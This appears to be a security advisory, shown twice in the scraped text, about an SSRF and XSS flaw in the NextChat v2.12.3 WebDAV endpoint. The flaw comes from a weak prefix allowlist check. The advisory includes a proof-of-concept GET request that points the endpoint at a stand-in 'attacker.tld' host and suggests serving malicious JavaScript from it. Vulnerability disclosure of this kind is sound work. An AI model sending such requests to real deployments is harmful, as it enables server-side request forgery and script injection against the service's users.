Summary
NexChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the endpoint GET parameter on the WebDav API endpoint.
Details
The vulnerability exists because of the following code snippet :
|
(allowedEndpoint) => endpoint?.startsWith(allowedEndpoint), |
// Validate the endpoint to prevent potential SSRF attacks
if (
!mergedAllowedWebDavEndpoints.some(
(allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
)
)
This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file :
|
export const internalAllowedWebDavEndpoints = [ |
export const internalAllowedWebDavEndpoints = [
"https://dav.jianguoyun.com/dav/",
"https://dav.dropdav.com/",
"https://dav.box.com/dav",
"https://nanao.teracloud.jp/dav/",
"https://bora.teracloud.jp/dav/",
"https://webdav.4shared.com/",
"https://dav.idrivesync.com",
"https://webdav.yandex.com",
"https://app.koofr.net/dav/Koofr",
];
Some allowed URLs do not enforce the trailing slash or a specific folder, which allows an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.
Note that in the default configuration, the target of this arbitrary HTTPS call must have a valid SSL/TLS certificate however NextChat will throw a 500 error due to the verification failure.
PoC
Hosting a local instance, the HTTP request used is the following :
GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
Host: 0.0.0.0:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
The attacker.tld hostname should be replaced with your own domain name and you will start seeing requests coming from the vulnerable instance. For example, it is possible to achieve a Cross-Site Scripting attack by hosting malicious JavaScript code on your own server :
Impact
This SSRF / XSS vulnerability can be used to perform arbitrary HTTPS request from the vulnerable instance (MKCOL, PUT and GET methods supported), or to target NextChat users and make them execute arbitrary JavaScript code in their browser and in the vulnerable instance context.
Summary
NexChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the
endpointGET parameter on the WebDav API endpoint.Details
The vulnerability exists because of the following code snippet :
ChatGPT-Next-Web/app/api/webdav/[...path]/route.ts
Line 28 in b6735bf
This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file :
ChatGPT-Next-Web/app/constant.ts
Line 205 in b6735bf
Some allowed URLs do not enforce the trailing slash or a specific folder, which allows an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.
Note that in the default configuration, the target of this arbitrary HTTPS call must have a valid SSL/TLS certificate however NextChat will throw a
500error due to the verification failure.PoC
Hosting a local instance, the HTTP request used is the following :
The
attacker.tldhostname should be replaced with your own domain name and you will start seeing requests coming from the vulnerable instance. For example, it is possible to achieve a Cross-Site Scripting attack by hosting malicious JavaScript code on your own server :Impact
This SSRF / XSS vulnerability can be used to perform arbitrary HTTPS request from the vulnerable instance (MKCOL, PUT and GET methods supported), or to target NextChat users and make them execute arbitrary JavaScript code in their browser and in the vulnerable instance context.